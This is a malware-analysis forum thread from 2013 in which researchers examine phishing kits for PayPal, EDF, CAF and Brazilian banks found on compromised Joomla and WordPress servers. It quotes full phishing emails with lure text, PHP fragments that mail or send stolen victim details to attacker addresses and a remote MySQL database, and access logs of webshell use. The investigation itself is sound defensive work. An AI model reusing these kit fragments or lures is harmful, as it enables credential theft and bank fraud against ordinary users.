A forum for reverse engineering, OS internals and malware analysis 

Phish-BankFraud

Forum for analysis and discussion about malware.

Phish-BankFraud

 #17681  by Xylitol
 Sat Jan 12, 2013 9:11 am
Hello,
Paypal phishing from http://www.phishtank.com/phish_detail.p ... id=1693107 & http://www.phishtank.com/phish_detail.p ... id=1693117
https://www.virustotal.com/file/55e42a6 ... 357981400/ > 37/46
Compromised server run Joomla 1.5.20 Stable Release [18-July-2010]. (cf: http://www.kernelmode.info/forum/viewto ... 410#p17684)

Rotators: (samples in attach)
Code: Select all
http://www.firstimpressionsimageconsulting.com/wp-includes/SimplePie/Decode/HTML/
https://www.virustotal.com/url/d1fcd384 ... 357981771/ > 3/34 - https://www.virustotal.com/file/211a323 ... 357991052/ > 0/46

Mail source:
Code: Select all
x-store-info:J++/JTCzmObr++wNraA4Pa4f5Xd6uensydyekesGC2M=
Authentication-Results: hotmail.com; spf=none (sender IP is 200.27.72.40) smtp.mailfrom=www-data@facultades.unab.cl; dkim=none header.d=Verifications.fr; x-hmca=none
X-SID-PRA: Paypal-Controle@Verifications.fr
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTE7YT0xO0Q9MTtHRD0xO1NDTD0y
X-Message-Info: 46fshLWf29At5eVYkiBeHGu9IXh19AFI7C9HI+GKRmhxpVFESzdsucMZDzZUjdLfi+btiLsEsw4RlGxVEzvMqr15xEpZUiQSthTg3X+pIKDzyBY4Pah1C0a/BJko2DEYjgLhCI112CUCcCxXTAATCw==
Received: from smtp.unab.cl ([200.27.72.40]) by BAY0-MC3-F15.Bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
	 Fri, 11 Jan 2013 17:21:14 -0800
Received: from facultades.unab.cl (egresados.unab.cl [200.27.73.19])
	by smtp.unab.cl (Postfix) with ESMTP id 8082D5E0CE3
	for <************@hotmail.fr>; Fri, 11 Jan 2013 22:18:04 -0300 (CLST)
Received: from www-data by facultades.unab.cl with local (Exim 4.63)
	(envelope-from <www-data@facultades.unab.cl>)
	id 1TtpjY-0003kN-DE
	for ************@hotmail.fr; Fri, 11 Jan 2013 22:18:04 -0300
To: ************@hotmail.fr
Subject: Urgents : Mettre à jour de vos informations personneles Paypal.fr !
From:  <Paypal-Controle@Verifications.fr>
MIME-Version: 1.0
Content-Type: text/html
Message-Id: <E1TtpjY-0003kN-DE@facultades.unab.cl>
Date: Fri, 11 Jan 2013 22:18:04 -0300
Return-Path: www-data@facultades.unab.cl
X-OriginalArrivalTime: 12 Jan 2013 01:21:15.0216 (UTC) FILETIME=[1D922D00:01CDF063]


<br><br> <hr><br><br> <strong>DRS : Direction Régional de PayPal </strong><br>
resend.php:
Code: Select all
$samaka = "asq01@hotmail.fr";
$subject = "Off $ip";
$from = "From: InfoRmation<google@gmail.com>";
$from .= "-Info\n";
mail($samaka,$subject,$message,$from); 
EDF phishing also in attach:
https://www.virustotal.com/file/a533635 ... 357985290/ > 0/46
Phishtank: http://www.phishtank.com/phish_detail.p ... id=1693109
sniper.php:
Code: Select all
<?php $to = "wait0all@gmail.com"; $ip = getenv("REMOTE_ADDR"
The following domain is related with this mail adress: Alomarks.at
http://www.whoismind.com/whois/alomarks.at.html

Cielo: http://www.phishtank.com/phish_detail.p ... id=1693131
https://www.virustotal.com/file/b0fb27b ... 357988824/ > 5/46
Code: Select all
$headers = "Content-type: text/html; charset=iso-8859-1\r\n";
$headers .= "From: Cielo <desejovip@hotmail.com"; 
Banco do Brasil phishing: http://www.phishtank.com/phish_detail.p ... id=1693133
https://www.virustotal.com/file/688a4b1 ... 357989472/ > 0/46
(phish.zip in attach)

The server was not only used for phishing but also as spam relay.
https://www.virustotal.com/file/c6269c8 ... 357986539/ > 5/46 - https://www.virustotal.com/file/6646f43 ... 357987304/ > 9/46 (PHP.Mailer)
Image Image
Also in attach

By reading access/error log files, i suspect 41.249.93.120 who used backdoors browse phish files and was the first to access thems.
Code: Select all
41.249.93.120 - - [01/Jan/2013:04:41:48 +1100] "GET /*********.php HTTP/1.1" 200 36209 "-" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.249.93.120 - - [01/Jan/2013:04:39:47 +1100] "POST /media/*********/rsform_backup_2010-09-30_183530.php?x&action=upload&chdir=/home/gtmaustr/public_html/media/**************/ HTTP/1.1" 200 11887 "http
[Tue Jan 01 04:35:41 2013] [error] [client 41.249.93.120] File does not exist: /home/gtmaustr/public_html/media/*********/imagens/pontabarramarela.png, referer: http://www.gtmaustralia.com.au/media/*********/cc/css/padrao3.css
[Tue Jan 01 04:35:41 2013] [error] [client 41.249.93.120] File does not exist: /home/gtmaustr/public_html/404.shtml, referer: http://www.gtmaustralia.com.au/media/*********/cc/css/padrao3.css
69.171.247.115 - - [01/Jan/2013:10:42:23 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13565 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
41.140.27.175 - - [03/Jan/2013:04:52:00 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13564 "-" "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.248.194.138 - - [03/Jan/2013:07:01:16 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14197 "-" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
200.140.128.46 - - [04/Jan/2013:13:46:34 +1100] "GET /media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&chdir=/home/gtmaustr/public_html/media/ HTTP/1.1" 200 14111 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.101 Safari/537.11"
41.248.111.156 - - [06/Jan/2013:03:46:30 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14197 "-" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
196.217.22.177 - - [07/Jan/2013:01:36:17 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14197 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
201.24.48.2 - - [07/Jan/2013:08:44:05 +1100] "GET /media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&action=edit&chdir=/home/gtmaustr/public_html/media/&file=C.php HTTP/1.1" 200 19077 "http://gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&chdir=/home/gtmaustr/public_html/media/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.101 Safari/537.11"
41.140.96.122 - - [07/Jan/2013:21:45:20 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 8643 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
105.137.51.125 - - [09/Jan/2013:01:05:07 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 15203 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
41.249.80.218 - - [10/Jan/2013:04:50:48 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 12376 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.140.101.235 - - [10/Jan/2013:08:05:29 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 16950 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
186.215.83.228 - - [10/Jan/2013:08:29:16 +1100] "GET /media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&action=edit&chdir=/home/gtmaustr/public_html/media/&file=C.php HTTP/1.1" 200 19077 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&action=backtool&chdir=/home/gtmaustr/public_html/media/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
105.141.50.243 - - [10/Jan/2013:09:58:47 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13090 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
105.142.9.86 - - [10/Jan/2013:16:07:11 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 8607 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
105.139.10.216 - - [11/Jan/2013:01:06:34 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13090 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.249.115.245 - - [11/Jan/2013:02:48:02 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14371 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
69.171.237.11 - - [11/Jan/2013:03:40:37 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13564 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
41.250.159.131 - - [11/Jan/2013:03:40:38 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13565 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
41.250.159.131 - - [11/Jan/2013:03:44:24 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13613 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.249.24.120 - - [11/Jan/2013:08:09:05 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13564 "-" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
177.43.16.17 - - [11/Jan/2013:09:31:47 +1100] "GET /media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&action=edit&chdir=/home/gtmaustr/public_html/media/&file=C.php HTTP/1.1" 200 19077 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.101 Safari/537.11"
105.137.137.86 - - [11/Jan/2013:13:05:31 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14216 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.143.4.42 - - [12/Jan/2013:00:45:23 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 11412 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.248.178.222 - - [12/Jan/2013:06:46:17 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14494 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.249.146.131 - - [12/Jan/2013:06:58:29 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14206 "-" "Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0"
105.139.9.75 - - [12/Jan/2013:12:55:20 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14369 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.137.59.63 - - [12/Jan/2013:16:18:09 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 20120 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0.1"
46.165.221.230 - - [12/Jan/2013:18:09:41 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13090 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
Some backdoors:
Code: Select all
http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php
http://www.gtmaustralia.com.au/INSTALL.php
http://www.gtmaustralia.com.au/components/com_search/search.php
http://www.gtmaustralia.com.au/components/com_poll/router.php
Attachments
infected
(746 Bytes) Downloaded 119 times
infected
(920.96 KiB) Downloaded 126 times
infected
(1.43 MiB) Downloaded 119 times
infected
(6.47 KiB) Downloaded 123 times
infected
(735.88 KiB) Downloaded 113 times
infected
(552.8 KiB) Downloaded 113 times

Re: Phish-BankFraud

 #17688  by unixfreaxjp
 Sat Jan 12, 2013 3:49 pm
Hi Xylit0l.

Bravo! You got all necessaries hooked up.
Below is my additional thought:
1. Now we got the wordpress /wp-includes/SimplePie/ flaw case. DORK "wp-includes/SimplePie CVE" will pop more infos.
The original files is on this: https://github.com/WordPress/WordPress/ ... /SimplePie
other than these will be an injected files.
2. As per mentioned in previous hacked case, the usage of injection code like:
Code: Select all
wp-includes/images/wlw/edfzefzefzefze.php?act=f&f=load.php&d=%2Fsrv%2Ffsugo%2Fwww%2Fwp-includes%2Fjs%2Ftinymce%2Ft..[code] will be a clue to grep the chars of the hacker's method & grab the ID/IP.
3. This is now more than coincidence, the IP you mentioned belong to Marocco:
[code]inetnum:        41.140.0.0 - 41.140.255.255
netname:        IP_ADSL_MarocTelecom
descr:          IP_ADSL_MarocTelecom
country:        MA
admin-c:        SMT1-AFRINIC
tech-c:         DMT1-AFRINIC
status:         ASSIGNED PA
mnt-by:         ONPT-MNT
source:         AFRINIC # Filtered
parent:         41.140.0.0 - 41.143.255.255

person:         SEPFS Maroc Telecom
address:        Service Exploitation des PFS
address:        MAROC TELECOM
address:        Avenue de France AGDAL
address:        Immeuble DR Rabat
e-mail:         nocmt@menara.ma
phone:          +21237686318
nic-hdl:        SMT1-AFRINIC
source:         AFRINIC # Filtered

person:         DEMPFS Maroc Telecom
address:        Division Exploitation et maintenance des PFS
address:        MAROC TELECOM
address:        Avenue de France AGDAL
address:        Immeuble DR Rabat
e-mail:         nocmt@menara.ma
phone:          +21237686318
nic-hdl:        DMT1-AFRINIC
source:         AFRINIC # Filtered
So does the previous case I mentioned you the IP of: 41.137.57.60 which also Marocco IP:
Code: Select all
inetnum:        41.137.56.0 - 41.137.57.255
netname:        INWI-PDSN1-Rabat001
descr:          This prefix is dedicated to mobile 3G Internet users on the capital Rabat and its surroundings
country:        MA
admin-c:        AN2-AFRINIC
tech-c:         AN2-AFRINIC
status:         ASSIGNED PA
mnt-by:         MCNET-MNT
source:         AFRINIC # Filtered
parent:         41.137.0.0 - 41.137.255.255

person:       Ahmed NASSIRI
address:      Angle Rue oumayma sayeh et mansour saadi
              quartier racine residence courteline casablanca
phone:        +212959230
fax-no:       +212390552
e-mail:       ahmed.nassiri@marocconnect.com
nic-hdl:      AN2-AFRINIC
source:       AFRINIC # Filtered
Both are using dynamic ip pointers suggested dial up users.
We're dealing with on-going Marocco hackers action that converts WP vulnerable sites into Phishing sites.now.

Re: Phish-BankFraud

 #17690  by Xylitol
 Sat Jan 12, 2013 5:20 pm
Hello, broken into another compromised server used for phishings.
http://www.phishtank.com/phish_detail.p ... id=1693105

Server is running Joomla
shells can be found here: http://www.kernelmode.info/forum/viewto ... 410#p17689 the classic Backdoor.PHP.WebShell.BD....

Mail source:
Code: Select all
x-store-info:fHNTDlzCF8Nxw6HwcfGQy+S7Ax/lqLSmNphQ3OF+T9E=
Authentication-Results: hotmail.com; spf=none (sender IP is 93.94.226.76) smtp.mailfrom=designfa@server45.firstfind.nl; dkim=none header.d=edf-internet.fr.firstfind.nl; x-hmca=none
X-SID-PRA: noreply@edf-internet.fr.firstfind.nl
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTE7YT0wO0Q9MjtHRD0yO1NDTD00
X-Message-Info: 5cuOr7VrmjApcnel9NDHJCECoyDEob6h2Gpg4EEc6it5atrg7ONrBUsfqShRqM9AS4egAorDiPL6mXa5ftD68Kx9DY/CeDjEtJ7TsRzUfPCINDv7CFmEBuRUErUgj02se+HExEOBrwrwvKw0h8PpgfRF6C450zw2
Received: from server45.firstfind.nl ([93.94.226.76]) by BAY0-MC3-F5.Bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
	 Thu, 10 Jan 2013 07:47:31 -0800
Received: from server45.firstfind.nl (localhost [127.0.0.1])
	by server45.firstfind.nl (8.14.3/8.14.3/Debian-9.4) with ESMTP id r0AFlUSr027387
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NOT)
	for <************@hotmail.fr>; Thu, 10 Jan 2013 16:47:30 +0100
Received: (from designfa@localhost)
	by server45.firstfind.nl (8.14.3/8.14.3/Submit) id r0AFlUnX027386;
	Thu, 10 Jan 2013 16:47:30 +0100
Date: Thu, 10 Jan 2013 16:47:29 +0100
To: ************@hotmail.fr
From: noreply@edf-internet.fr.firstfind.nl
Reply-to: noreply@edf-internet.fr.firstfind.nl
Subject: Bleu Ciel d'EDF - Votre-Facture: (Y1-FT-TT-09-U3)
Message-ID: <07e3df1f477fb4022e91dd0899b91df0@www.design-factory-verbaarschot.nl>
X-Priority: 1
X-Mailer: PHPMailer [version ]
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Content-Type: text/html; charset="iso-8859-1"
X-Virus-Scanned: by amavisd-new
Return-Path: designfa@server45.firstfind.nl
X-OriginalArrivalTime: 10 Jan 2013 15:47:32.0083 (UTC) FILETIME=[CD5F2C30:01CDEF49]

<div class="mail-content-read" id="message">
<img style="text-align: center; font-size: 15px;" alt="vente-privee.com" src="" height="" width="">
<div></div><!-- END : Bandeau --><!-- BEGIN : title next Sales -->
<div> </div>
<div> </div>

	
<a href="http://fogosh.com/database/service_edf_enligne_145_uoe74/" target="_blank"><img alt="" src="http://panachepictures.co.uk/EDF.png"><br>

<img style="text-align: center; font-size: 18px;" alt="vente-privee.com" src="" height="" width="">
<div></div>

    </a><div></div><!-- END : Bandeau --><!-- BEGIN : title next Sales --><table cellpadding="0" cellspacing="0" width="588">
  <tbody>

</tbody></table>
<table cellpadding="0" cellspacing="0" width="588">
  <tbody>
  <tr>
       <td style="height: 0px;" height="15"></td></tr></tbody></table><!--Fin de creation des bandeaux des ventes futures--><!--Debut Pied de page --><!-- END : next Sales --><a style="color: rgb(242, 30, 140);" href="C:UsersAdministratorDocumentsSarbacane%203CampaignsDemo%20campaignHtmlCachehttp___mailing.vente-privee.com_r__id=h712fcab9,e1de309,e1de35d&p1=www.vente-privee.com_vp4" _label="Aide" target="_blank"><font color="#ffffff">.</font></a>   <font color="#ffffff">|</font>  <a style="color: rgb(242, 30, 140);" href="C:UsersAdministratorDocumentsSarbacane%203CampaignsDemo%20campaignHtmlCachehttp___mailing.vente-privee.com_r__id=h712fcab9,e1de309,e1de359&p1=fr.vente-privee.com_ExternalLinks_AutoLogin.ashx_i=0_H6wwchdE0y2_YmuklX2oBwBWBwFIdQHSY2qLCChGsLOCwDCLwWmJMVg9_cUit8z56nWjr51yL+H7YcVicfqJx6PXpMJTCYCXDVsjFEAt0iLUlLX7lq1g==" _label="Parrainage" target="_blank"><font color="#ffffff">Parrainer</font> <font color="#ffffff">mes</font> <font color="#ffffff">.</font></a>  <f!
 ont color="#ffffff">|</font>  <a style="color: rgb(242, 30, 140);" href="C:UsersAdministratorDocumentsSarbacane%203CampaignsDemo%20campaignHtmlCachehttp___mailing.vente-privee.com_r__id=h712fcab9,e1de309,e1de35a&p1=fr.vente-privee.com_ExternalLinks_AutoLogin.ashx_i=0_H6wwchdE0y2_YmuklX2oBwBWBwFIdQHSY2qLCChGsLOCwDCLwWmJMVg9_cUit8iZ+F8IyGOpKk5ZTurAZ_RvvEhn5vpDF4arGKf_5NPp5tSuqWNTNiIQ_Cp4EnoHbBmJjJqD0wEItnDicwaxvinQvmGuTrJdczlhQth9AHeP6tv5xkJ3sCyA==" _label="Ne plus recevoir nos offres" target="_blank"> <font color="#ffffff">.</font> 

<font color="#ffffff">.</font>
EDF targeted for phishings.
The log files was cleaned so... i'm angry. only victims and my ip...
Image

index3.php:
Code: Select all
$myemail="jinshoori@gmail.com,t0od@hotmail.fr";
And used for spam relay here again:
Image
https://www.virustotal.com/file/41b5f57 ... 358010960/ > 4/46

Remember when i saturated a EDF phishing server ?
http://www.kernelmode.info/forum/viewto ... 410#p17618
It's probably the same guys.
Attachments
infected
(21.36 KiB) Downloaded 94 times
infected
(190.57 KiB) Downloaded 88 times
infected
(124.39 KiB) Downloaded 90 times
infected
(246.14 KiB) Downloaded 92 times

Re: Phish-BankFraud

 #17691  by unixfreaxjp
 Sat Jan 12, 2013 6:25 pm
Same guys "from Marocco" < see the 2 cases IPs , are blacklisting now < is a dial-up users of local Telecom anyway,
the more of these incidents will happen for sure.

Xylit0l, if we can pass the exact time and IP access log we discuss before to the authorithy then
the Marocco police can coordinate with Telecom/ISP to nail this guy.

BTW can kernelmode posts be viewed by non-members?
If so.. is the explanation of the erasing of the log.

Re: Phish-BankFraud

 #17692  by Xylitol
 Sat Jan 12, 2013 6:30 pm
I've already contacted the french police and EDF about these.
For kernelmode posts, yes they can be viewed by non-members.
Explanation of erasing log i don't understand what you says ?

Also u.php in attach it's an archive unzipper, probably used by hacker to unzip phishing stuff when uploaded with a WSO shell.

and another phish, loginAction.action.php:
Code: Select all
$myemail = "jinshoori@gmail.com"; //email hna 
Attachments
infected
(128.32 KiB) Downloaded 89 times
infected
(29.04 KiB) Downloaded 87 times

Re: Phish-BankFraud

 #17706  by Xylitol
 Mon Jan 14, 2013 8:51 am
Hello, previous edf phish servers are under investigation now.
Also found new Paypal phishing via markusg, targeting german ppl on another compromised server running wordpress. http://www.phishtank.com/phish_detail.p ... id=1694455
Shells can be found here: http://www.kernelmode.info/forum/viewto ... =10#p17705
Image

No mail adress this time, user details are sent to a mySQL db on another server.
Code: Select all
mysql_connect("193.107.19.***", "ccs", "LTBDVQ7bYewff5Dc");
        mysql_select_db("ccs");
        $url = mysql_real_escape_string($_S
'ccs' make me think 'credit card sell'
on the server where datas are sent the hacker have a parser for credit cards.
Image Image
phishs pages in attach.

the server was also used for spam.
Image
https://www.virustotal.com/file/48544cc ... 358153370/ > 5/46
additional stuff in attach.
Attachments
infected
(8.96 KiB) Downloaded 82 times
infected
(1.11 MiB) Downloaded 100 times

Re: Phish-BankFraud

 #17887  by Xylitol
 Sun Jan 27, 2013 12:10 pm
CAF + EDF phishing dumped

Phishing redirector: http://www.phishtank.com/phish_detail.p ... id=1711740
https://www.virustotal.com/url/66f14aa1 ... 359285567/ > 0/33

CAF: http://www.phishtank.com/phish_detail.p ... id=1711743
Code: Select all
$MooT   .= "blackdevilops@gmail.com";
$Meknes .= "------------------------------\n";

$s4iir = "CAF REZULT";
$sii = "From:$fr<lawie@caf-sem.fr>";

mail($MooT,$s4iir,$Meknes,$sii); 
EDF: http://www.phishtank.com/phish_detail.p ... id=1711741
Code: Select all
$zobob .= "blackdevilops@gmail.com";
$zobab .= "------------------------------\n";

$s4wir = "[FR]--->$zabab | $fr";

$sii = "From: Particulier Rezult<root@edf.com>"; 
Mail Source:
Code: Select all
x-store-info:J++/JTCzmObr++wNraA4Pa4f5Xd6uensydyekesGC2M=
Authentication-Results: hotmail.com; spf=none (sender IP is 64.29.144.244) smtp.mailfrom=pr-fit.co.uk@carrierzone.com; dkim=none header.d=bleu.ciel.fr; x-hmca=none
X-SID-PRA: Interface@bleu.ciel.fr
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTE7YT0xO0Q9MTtHRD0xO1NDTD0z
X-Message-Info: aKlYzGSc+LnEQMEKl4sGV8t2ShvSJdjD2fIjeCBUtTPgtL1h6SKfceAFCZGw5S4SGmgQKRvRqWRZ6EKrvingqxV8TFCU42MR7g2uQZx5ZX33fUiERm14X/F9BEBR/bnp6TzOpHz9tb1kB4IeTOT3hH/Ij09bTMW5
Received: from mailrelay2c25.carrierzone.com ([64.29.144.244]) by COL0-MC4-F28.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
	 Sat, 26 Jan 2013 05:53:10 -0800
Received: from web163c30.carrierzone.com (web163c30.carrierzone.com [69.49.117.173])
	by mailrelay2c25.carrierzone.com (8.13.6/8.13.1) with ESMTP id r0QDr89e006554
	for <*************@hotmail.fr>; Sat, 26 Jan 2013 08:53:08 -0500
Received: from web163c30.carrierzone.com (localhost [127.0.0.1])
	by web163c30.carrierzone.com (8.13.6/8.12.6/SuSE Linux 0.6) with ESMTP id r0QDr8P6018393
	for <*************@hotmail.fr>; Sat, 26 Jan 2013 13:53:08 GMT
Received: (from pr-fit.co.uk@localhost)
	by web163c30.carrierzone.com (8.13.6/8.12.6/Submit) id r0QDr8Vn018392;
	Sat, 26 Jan 2013 13:53:08 GMT
Date: Sat, 26 Jan 2013 13:53:08 +0000
To: *************@hotmail.fr
From: Interface@bleu.ciel.fr
Reply-to: Interface@bleu.ciel.fr
Subject: =?iso-8859-1?Q?Avis_de_coupure:_probl=E8me_technique_sur_le_systeme_de_pr?=
 =?iso-8859-1?Q?=E9l=E8vement_automatique_-_Espace_Client_-_Janvier_2013?=
Message-ID: <9ef8d6df22ef288cffbc3eab4f41ffc9@www.pr-fit.co.uk>
X-Priority: 3
X-Mailer: PHPMailer [version ]
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Content-Type: text/html; charset="iso-8859-1"
X-CSC: 0
X-CHA: v=1.1 cv=YoxKUmeBphtliiuLKtTANbN4Bi4MUMO3GjZLVvBH9Ts= c=1 sm=1
		a=p0EDqwt2g-YA:10 a=jPJDawAOAc8A:10 a=8nJEP1OIZ-IA:10 a=-uxG0W0WAAAA:8
		a=wwmC1az3AAAA:8 a=AXohNxyG3XavjBJh5ykA:9 a=wPNLvfGTeEIA:10
		a=tXsnliwV7b4A:10 a=Kyz4R7H7QncA:10 a=spzXjULuW0IVPiXG:21
		a=i/V8Wv9NnezdD4t9MK0P5A==:117
Return-Path: pr-fit.co.uk@carrierzone.com
X-OriginalArrivalTime: 26 Jan 2013 13:53:11.0004 (UTC) FILETIME=[7A7599C0:01CDFBCC]

<b>Votre espace Client</b> <br>
<br>
<b style="font-size:12px"><span>Bonjour</span> Mme,M.</b><p></p>
<p>
<span style="font-size:12px"><span style="color:rgb(51,51,51);line-height:15px;font-family:Arial">Ce mail vous est envoye en dernier avis, apres plusieurs tentatives infructueuses de vous joindre sur Votre numero personnel.<br style="line-height:15px">
En effet le 24/01/2013 une erreur s'est produit lors des prelevements de la mensualite effectue sur votre Compte ce dernier etait doublement debiter de la somme de cinquante-neuf quatre vingt </span><span style="line-height:15px;font-family:Arial">59.80</span> <span style="color:rgb(51,51,51);line-height:15px;font-family:Arial"> (29.90*2)<br style="line-height:15px">
Pour une regularisation immediate de votre situation, et le remboursement de la somme debitee vous Devez remplir instamment le formulaire ci-dessous.</span> <font style="font-weight:normal;word-spacing:0px;text-transform:none;color:rgb(0,0,0);text-indent:0px;line-height:normal;font-style:normal;white-space:normal;letter-spacing:normal;font-variant:normal" color="black" face="Arial" size="1"> <span style="font-size:9pt;color:black;line-height:15px;font-family:Arial"> </span></font></span><br style="line-height:15px">
<span style="font-size:12px"> Pour <span>activer votre espace Client, cliquez sur le lien suivant :</span></span></p>


 



<br>
<table background="https://monagencepart.edf.fr/ASPFront/campaigns/emails/images//bg-code.jpg" bgcolor="#345ca3" border="0" cellpadding="15" cellspacing="0" width="570">
<tbody>
<tr>
<td style="color:#fff" align="center">
